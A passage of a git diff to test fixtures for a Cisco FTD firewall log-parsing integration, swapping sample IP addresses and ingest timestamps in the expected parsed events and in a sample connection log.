@@ -3350,8 +3350,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:48.994177134Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:33:04.305896300Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3384,8 +3384,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3414,7 +3414,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3423,8 +3423,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994178930Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:33:04.305901700Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3454,8 +3454,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3484,7 +3484,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, 
@@ -3493,8 +3493,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994180767Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:33:04.305907100Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3519,8 +3519,8 @@ }, "destination": { "port": 5000, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5679, @@ -3560,7 +3560,7 @@ ], "ip": [ "192.168.1.34", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -3568,8 +3568,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994182571Z", - "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", + "ingested": "2021-12-09T13:33:04.305912500Z", + "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -3601,8 +3601,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3637,7 +3637,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, 
@@ -3646,8 +3646,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994184522Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:33:04.305918Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3663,7 +3663,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3681,8 +3681,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3717,7 +3717,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3726,8 +3726,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994186306Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:33:04.305923400Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -3743,7 +3743,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3761,8 +3761,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3797,7 +3797,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "10.10.10.10" ] }, @@ -3808,8 +3808,8 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:48.994188130Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "ingested": "2021-12-09T13:33:04.305928800Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-10T08:01:54.000Z", @@ -3881,7 +3881,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-07-19T09:06:48.994189927Z", + "ingested": "2021-12-09T13:33:04.305934100Z", "original": "Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3909,8 +3909,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -3940,7 +3940,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { 
@@ -3948,8 +3948,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994191735Z", - "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305939400Z", + "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3973,8 +3973,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4004,7 +4004,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4012,8 +4012,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994193552Z", - "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305944700Z", + "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4037,8 +4037,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4068,7 +4068,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { 
@@ -4076,8 +4076,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994195355Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305950Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4101,8 +4101,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4132,7 +4132,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4140,8 +4140,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994197207Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305955300Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4165,8 +4165,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4196,7 +4196,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { 
@@ -4204,8 +4204,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994199043Z", - "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305960800Z", + "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4229,8 +4229,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4260,7 +4260,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4268,8 +4268,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994200842Z", - "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305966100Z", + "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4332,7 +4332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994202637Z", + "ingested": "2021-12-09T13:33:04.305971500Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4396,7 +4396,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994204439Z", + "ingested": "2021-12-09T13:33:04.305976800Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", 
@@ -4427,8 +4427,8 @@ }, "source": { "port": 24069, - "address": "192.0.2.95", - "ip": "192.0.2.95" + "address": "192.168.2.95", + "ip": "192.168.2.95" }, "tags": [ "preserve_original_event" @@ -4462,7 +4462,7 @@ "GIFRCHN01" ], "ip": [ - "192.0.2.95", + "192.168.2.95", "10.32.112.125" ] }, @@ -4471,8 +4471,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994206215Z", - "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", + "ingested": "2021-12-09T13:33:04.306013300Z", + "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -4536,7 +4536,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:06:48.994208006Z", + "ingested": "2021-12-09T13:33:04.306019700Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4599,7 +4599,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994209824Z", + "ingested": "2021-12-09T13:33:04.306025100Z", "original": "Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4628,15 +4628,15 @@ "level": "warning" }, "destination": { - "address": "192.88.99.129", + "address": "192.168.99.129", "port": 80, "domain": "bad.example.com", - "ip": "192.88.99.129" + "ip": "192.168.99.129" }, "source": { "nat": { "port": 7890, - "ip": "192.88.99.1" + "ip": "192.168.99.1" }, "address": "10.1.1.45", "port": 6798, 
@@ -4674,14 +4674,14 @@ ], "ip": [ "10.1.1.45", - "192.88.99.1", - "192.88.99.129" + "192.168.99.1", + "192.168.99.129" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994211693Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com", + "ingested": "2021-12-09T13:33:04.306030500Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", "action": "firewall-rule", @@ -4698,8 +4698,8 @@ "ftd": { "destination_interface": "outside", "mapped_source_port": 7890, - "mapped_destination_ip": "192.88.99.129", - "mapped_source_ip": "192.88.99.1", + "mapped_destination_ip": "192.168.99.129", + "mapped_source_ip": "192.168.99.1", "rule_name": "dynamic", "source_interface": "inside", "mapped_destination_port": 80 @@ -4712,11 +4712,11 @@ }, "destination": { "nat": { - "ip": "192.0.2.225" + "ip": "192.168.2.225" }, - "address": "192.0.2.223", + "address": "192.168.2.223", "port": 80, - "ip": "192.0.2.223" + "ip": "192.168.2.223" }, "source": { "nat": { 
@@ -4756,14 +4756,14 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223", - "192.0.2.225" + "192.168.2.223", + "192.168.2.225" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994213531Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.225/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:33:04.306039700Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", "action": "firewall-rule", @@ -4780,7 +4780,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.225", + "mapped_destination_ip": "192.168.2.225", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4797,9 +4797,9 @@ "nat": { "port": 8080 }, - "address": "192.0.2.223", + "address": "192.168.2.223", "port": 80, - "ip": "192.0.2.223" + "ip": "192.168.2.223" }, "source": { "nat": { 
@@ -4839,13 +4839,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994215355Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/8080), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:33:04.306045100Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", "action": "firewall-rule", @@ -4863,7 +4863,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4877,8 +4877,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "source": { "address": "10.30.30.30", @@ -4903,13 +4903,13 @@ "related": { "ip": [ "10.30.30.30", - "192.0.2.1" + "192.168.2.1" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994217158Z", - "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app", + "ingested": "2021-12-09T13:33:04.306050700Z", + "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", "action": "firewall-rule", 
@@ -4931,8 +4931,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.32", - "ip": "192.0.2.32" + "address": "192.168.2.32", + "ip": "192.168.2.32" }, "source": { "address": "10.5.111.32", @@ -4959,13 +4959,13 @@ "related": { "ip": [ "10.5.111.32", - "192.0.2.32" + "192.168.2.32" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994218952Z", - "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com", + "ingested": "2021-12-09T13:33:04.306056Z", + "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4987,8 +4987,8 @@ "level": "notification" }, "destination": { - "address": "192.0.0.19", - "ip": "192.0.0.19" + "address": "192.168.0.19", + "ip": "192.168.0.19" }, "source": { "address": "10.69.6.39", @@ -5021,13 +5021,13 @@ "related": { "ip": [ "10.69.6.39", - "192.0.0.19" + "192.168.0.19" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994220795Z", - "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside", + "ingested": "2021-12-09T13:33:04.306061300Z", + "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log index c81a41dfb1f..c460849f58e 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log 
@@ -1,10 +1,10 @@
 2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity
 2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity
-2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address
-2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395
-2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
-2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb
-2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
-2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip
+2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address
+2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395
+2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
